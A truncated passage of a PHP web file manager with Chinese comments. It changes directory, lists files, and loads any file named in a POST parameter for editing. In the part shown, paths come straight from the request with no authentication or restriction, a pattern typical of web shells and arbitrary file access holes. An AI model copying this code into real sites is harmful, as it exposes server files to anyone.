'; } } // 目录跳转 if ($_POST['action'] == 'change_dir') { $dir = isset($_POST['dir']) ? $_POST['dir'] : $root; } } // 获取目录列表 function listFiles($dir) { $files = []; if (is_dir($dir)) { $handle = opendir($dir); while (($file = readdir($handle)) !== false) { if ($file != '.' && $file != '..') { $fullPath = $dir . DIRECTORY_SEPARATOR . $file; $files[] = $fullPath; } } closedir($handle); } return $files; } // 处理点击编辑的文件 if (isset($_POST['action']) && $_POST['action'] == 'edit' && isset($_POST['file']) && file_exists($_POST['file'])) { $file = $_POST['file']; $content = file_get_contents($file); echo '
当前目录: